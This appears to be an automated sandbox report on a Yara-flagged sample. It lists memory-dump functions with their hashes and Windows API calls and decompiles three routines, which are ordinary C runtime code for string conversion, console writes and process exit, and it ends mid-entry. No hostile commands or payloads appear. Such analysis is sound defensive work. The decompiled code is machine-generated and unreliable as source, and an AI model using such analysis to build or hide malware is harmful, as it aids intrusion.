                • API String ID: 2591292051-0
                • Opcode ID: 28434f7625e144b1e2e391fe145c0786527596ec6f187d1ac4a7bdd76dd5ce78
                • Instruction ID: 8ac816b79ff7be4f861e75fd706d7aa93921c6a9335be3c82993630b5809dbb4
                • Opcode Fuzzy Hash: 28434f7625e144b1e2e391fe145c0786527596ec6f187d1ac4a7bdd76dd5ce78
                • Instruction Fuzzy Hash: E31136B5C047498FCB10CF99C5857DEBBF4BB48320F14842AD969A7340D338A685CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BD238, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 051BD29D
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: de9742e81c9a09e39f1a4e81e4c1aca8ac5df0360bf9a9bab6e281ab412b3c9f
                • Instruction ID: e93aba23d3fbf60ad878e19f90357318c4f04eb085e9dd9b502653d074b051c0
                • Opcode Fuzzy Hash: de9742e81c9a09e39f1a4e81e4c1aca8ac5df0360bf9a9bab6e281ab412b3c9f
                • Instruction Fuzzy Hash: 9811F2B58007899FDB10CF99D588BDEBBF8EB48310F10885AE969A7600C378A545CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0254FE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 0254FE9D
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 7c8fa0c6e4bacd91be2b39fab396e0b5485b6d8cbbd217d75601a6d364d2ca08
                • Instruction ID: 0c4a1d6c7e17b6d94d94eeea52101524ebc461616a921d63eda2ef8cd72972f3
                • Opcode Fuzzy Hash: 7c8fa0c6e4bacd91be2b39fab396e0b5485b6d8cbbd217d75601a6d364d2ca08
                • Instruction Fuzzy Hash: 761133B58003498FDB10CF99C585BDEFBF8FB48314F20845AE869A7600C378A946CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BC3D0, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051B226A,?,00000000,?), ref: 051BC435
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 987da80552caa4e2eac10f4a6cd8e7489df960c17b56e2b734fa5cac0fe89ca9
                • Instruction ID: ebf746ed0cf68e9019e4b74e461b24b043c0b482185dffe11f4e7ae527ff1e46
                • Opcode Fuzzy Hash: 987da80552caa4e2eac10f4a6cd8e7489df960c17b56e2b734fa5cac0fe89ca9
                • Instruction Fuzzy Hash: 9311D3B59007499FDB10CF99C585BEEBBF8EB48314F10885AE559A7600C3B8AA45CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05390438, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.326769052.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 08d72b0e5a313a39dc8acb56b124a4bdcc1a6971ccfd3cee4dabb772bb32b204
                • Instruction ID: cea18f221c4a089235a4f7911e36c75c1db4257cd70102a88d7ede4885aa5d80
                • Opcode Fuzzy Hash: 08d72b0e5a313a39dc8acb56b124a4bdcc1a6971ccfd3cee4dabb772bb32b204
                • Instruction Fuzzy Hash: 4A11F2B5C04A899FCB14CF9AE448BDEFBF4AB48314F10852AE569A3600C378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0254FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 0254FE9D
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 7f961db8910366b734c990cc209ec2fe01ec4ece6c33128cbaa66eafd1b74d51
                • Instruction ID: b5257118056c4ebe0e1ccae5827ba3fd909c6a9341438e992af73c69d9f67dee
                • Opcode Fuzzy Hash: 7f961db8910366b734c990cc209ec2fe01ec4ece6c33128cbaa66eafd1b74d51
                • Instruction Fuzzy Hash: 221100B59006498FDB10CF99D488BDEFBF8EB48324F10845AE929A7700C374A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BBC59, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051BBCBD
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: c093ebeedce1259ddcaa8af98cd09254c5e3baeaf2c8096b9d7019b754d3f12b
                • Instruction ID: 181934a17ca6c84b46343718f7989625c4775e8d85cb8b83eb614b8e607772f2
                • Opcode Fuzzy Hash: c093ebeedce1259ddcaa8af98cd09254c5e3baeaf2c8096b9d7019b754d3f12b
                • Instruction Fuzzy Hash: 4F11E2B58047898FDB10CF99D585BDEBBF8FB48314F10885AE569A7700C378A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05390440, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.326769052.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 6246c005e75ef8f0976824e8dd41b26eb829bc314e381e343c983e6a09da465a
                • Instruction ID: 66ee544cfe1b9a1d026607f4b366352c6b6f30ae487c6fefa61cb683cfab8c2b
                • Opcode Fuzzy Hash: 6246c005e75ef8f0976824e8dd41b26eb829bc314e381e343c983e6a09da465a
                • Instruction Fuzzy Hash: B011D0B5D04A498FCB14CF9AD448BDEFBF8EB48314F10852AE969A7200D378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 021FD5B0, Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.323359187.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5130d5457a864ceebbba44fd86442ed3d9b97f5344a383f70516c4e8ece92db9
                • Instruction ID: a180117194d347f3aafea24f52890ccd5e67e8a3a45a2fbe357bb5ad724154e4
                • Opcode Fuzzy Hash: 5130d5457a864ceebbba44fd86442ed3d9b97f5344a383f70516c4e8ece92db9
                • Instruction Fuzzy Hash: F92125B1548240DFDB04DF10E8C0B3ABF65FB88324F24C569EA194B206C336D856CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0220D1D4, Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.323377830.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b01563a98cfe74db091e35823b65e3b5e9753be7f50ee8d477da8d204a6aabcf
                • Instruction ID: 43597dc6a17a520d62271b85b0f829ad2968cd3b4aa1d618fef780e06caa5b9f
                • Opcode Fuzzy Hash: b01563a98cfe74db091e35823b65e3b5e9753be7f50ee8d477da8d204a6aabcf
                • Instruction Fuzzy Hash: FD210770518244EFDB01DFD4D9C0B2ABBA5FB88314F24C56DE9094B28BC7B6D806CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0220D01C, Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.323377830.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 548c617ff451607e8d9650277cfbdd30fe4f1e324033f5467516ab46ce92efad
                • Instruction ID: 04ac7b4fffc3e4383963a790df5c35de99dabba4aafe1e823301f69a9cdc979e
                • Opcode Fuzzy Hash: 548c617ff451607e8d9650277cfbdd30fe4f1e324033f5467516ab46ce92efad
                • Instruction Fuzzy Hash: AE21F574618244EFDB14CFA4D8C0F26BB66FB84314F24C569E94E4B28BC376D806CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0220D007, Relevance: .1, Instructions: 61COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.323377830.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c63da472b792fbd78c8f9a3b0d2513d81ed0aa0eb8ee08c54c6b00efce95007
                • Instruction ID: 7f065a3a21c8b956635df593a030cfe2b117bddf3e9b69613fc25148204149f2
                • Opcode Fuzzy Hash: 0c63da472b792fbd78c8f9a3b0d2513d81ed0aa0eb8ee08c54c6b00efce95007
                • Instruction Fuzzy Hash: 10215E755093C09FCB12CF64D9D4B15BF72EB46314F28C5DAD8498B6A7C33A980ACB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 021FD5AB, Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.323359187.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction ID: 887715668355cdc97c4251c215fbab4e1ac20b06e40e3b9d21e1ebfe605ddae6
                • Opcode Fuzzy Hash: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction Fuzzy Hash: EE1181B6544280DFCF15CF10E9C4B6ABF61FB84324F24C6A9D9094B656C336D45ACBE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0220D1CF, Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.323377830.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction ID: ae80abf4f6696c81865897cae4ace3ba45fcf401c18ba1bdac8c53404d9c13e8
                • Opcode Fuzzy Hash: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction Fuzzy Hash: 2411DD75904280DFDB01CF94D5C0B15FBA1FB88314F24C6AED8494B69BC37AD80ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 021FD01D, Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.323359187.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a34b47298352f33748e1c35f422b401995b0a6795fb68e901acfd94f7d919157
                • Instruction ID: c2cdeff4db811324d2322cdb8c6677730c649b2c1215fc259bb83fdd097ceded
                • Opcode Fuzzy Hash: a34b47298352f33748e1c35f422b401995b0a6795fb68e901acfd94f7d919157
                • Instruction Fuzzy Hash: 94012B70448384AED7508B25EC8477BBB8CEF41228F19C05AEF385B646C378D845C7B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 021FD006, Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.323359187.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 91113caf714a70543349a1a548af955ef42614e71ee786563d15dd83caff0f96
                • Instruction ID: 867a5131a6276ccc03480b9f79414113a30ef48b433d4923095b19668aeff6e6
                • Opcode Fuzzy Hash: 91113caf714a70543349a1a548af955ef42614e71ee786563d15dd83caff0f96
                • Instruction Fuzzy Hash: 55019E7100D3C05FD7128B259C94B62BFB8EF43224F1980DBD9988F2A3C3688849C772
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x230c200f
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080DB(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                0x004078d4
                0x004078d5
                0x004078d6
                0x004078dd
                0x004078e2
                0x004078e8
                0x004078ee
                0x004078f4
                0x004078f7
                0x004078f7
                0x004078fa
                0x004078fc
                0x004078fc
                0x004078fa
                0x004078fe
                0x00407903
                0x0040790a
                0x0040790d
                0x0040790d
                0x00407929
                0x0040792f
                0x00407934
                0x00407ac7
                0x00407ad2
                0x00407ada
                0x0040793a
                0x0040793a
                0x0040793d
                0x00407942
                0x00407946
                0x0040799a
                0x0040799a
                0x0040799c
                0x0040799e
                0x00407abc
                0x00407abc
                0x00407abe
                0x00407abf
                0x00407ac5
                0x00000000
                0x00407ac5
                0x004079af
                0x004079b5
                0x004079b7
                0x00000000
                0x00000000
                0x004079bd
                0x004079cf
                0x004079d4
                0x004079d8
                0x00000000
                0x00000000
                0x004079e5
                0x00407a1f
                0x00407a22
                0x00407a25
                0x00407a27
                0x00407a29
                0x00407a2b
                0x00407a77
                0x00407a77
                0x00407a79
                0x00407a79
                0x00407a7b
                0x00407ab5
                0x00407ab6
                0x00000000
                0x00407abb
                0x00407a8f
                0x00407a94
                0x00407a96
                0x00000000
                0x00000000
                0x00407a9a
                0x00407a9b
                0x00407a9c
                0x00407a9f
                0x00407adb
                0x00407ade
                0x00407aa1
                0x00407aa1
                0x00407aa2
                0x00407aa2
                0x00407aaf
                0x00407ab1
                0x00407ab3
                0x00407ae4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407ab3
                0x00407a2d
                0x00407a30
                0x00407a32
                0x00407a34
                0x00407a36
                0x00407a39
                0x00407a3e
                0x00407a59
                0x00407a5b
                0x00407a65
                0x00407a67
                0x00407a68
                0x00407a6a
                0x00000000
                0x00000000
                0x00407a6c
                0x00407a72
                0x00407a72
                0x00000000
                0x00407a72
                0x00407a40
                0x00407a42
                0x00407a46
                0x00407a4b
                0x00407a4d
                0x00407a4f
                0x00000000
                0x00000000
                0x00407a51
                0x00000000
                0x00407a51
                0x004079e7
                0x004079ec
                0x00000000
                0x00000000
                0x004079f2
                0x004079f4
                0x00000000
                0x00000000
                0x00407a10
                0x00407a14
                0x00000000
                0x00000000
                0x00000000
                0x00407a1a
                0x0040794d
                0x0040794f
                0x00407951
                0x00407959
                0x00407978
                0x0040797a
                0x00407984
                0x00407986
                0x00407987
                0x00407989
                0x00000000
                0x00000000
                0x0040798f
                0x00407995
                0x00407995
                0x00000000
                0x00407995
                0x0040795d
                0x00407961
                0x00407966
                0x0040796a
                0x00000000
                0x00000000
                0x00407970
                0x00000000
                0x00407970

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: HeapAlloc.KERNEL32(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                • String ID:
                • API String ID: 2597970681-0
                • Opcode ID: 2acbdce31c841228e4f1b43f9461c59ea2f4b9e7753061a6b0d4f9641481498b
                • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                • Opcode Fuzzy Hash: 2acbdce31c841228e4f1b43f9461c59ea2f4b9e7753061a6b0d4f9641481498b
                • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408226, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x230c200f
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                0x0040822e
                0x00408235
                0x00408238
                0x00408240
                0x00408244
                0x00408250
                0x00408253
                0x00408256
                0x0040825d
                0x00408265
                0x00408268
                0x0040826e
                0x00408274
                0x00408279
                0x0040827b
                0x0040827e
                0x00408283
                0x0040828d
                0x00408294
                0x00408297
                0x0040829e
                0x004082a5
                0x004082d1
                0x004082f7
                0x004082f9
                0x00000000
                0x004082d3
                0x004082d6
                0x0040839d
                0x004083a9
                0x004083b4
                0x004083b9
                0x004082dc
                0x004082e3
                0x004082e8
                0x004082ee
                0x004082f4
                0x00000000
                0x004082f4
                0x004082ee
                0x004082d6
                0x004082a7
                0x004082ab
                0x004082ae
                0x004082b4
                0x004082b6
                0x004082b9
                0x004082bd
                0x004082fa
                0x004082fd
                0x004082fe
                0x00408303
                0x00408309
                0x0040830f
                0x0040831e
                0x00408324
                0x0040832a
                0x0040832f
                0x0040834b
                0x004083be
                0x004083c4
                0x0040834d
                0x00408355
                0x0040835e
                0x00408364
                0x00000000
                0x00408366
                0x00408368
                0x0040836b
                0x00408384
                0x00000000
                0x00408386
                0x0040838a
                0x0040838c
                0x0040838f
                0x00000000
                0x0040838f
                0x0040838a
                0x00408384
                0x00408364
                0x0040835e
                0x0040834b
                0x0040832f
                0x00408309
                0x00000000
                0x00408392
                0x00408392
                0x004083c6
                0x004083d0
                0x004083d8

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                • __fassign.LIBCMT ref: 004082E3
                • __fassign.LIBCMT ref: 004082FE
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
                • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x230c200f
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                0x00403639
                0x00403640
                0x00403643
                0x00403647
                0x00403652
                0x0040365a
                0x00403665
                0x0040366b
                0x0040366f
                0x00403676
                0x0040367c
                0x0040367c
                0x0040367e
                0x00403683
                0x00403688
                0x00403688
                0x00403693
                0x0040369b

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
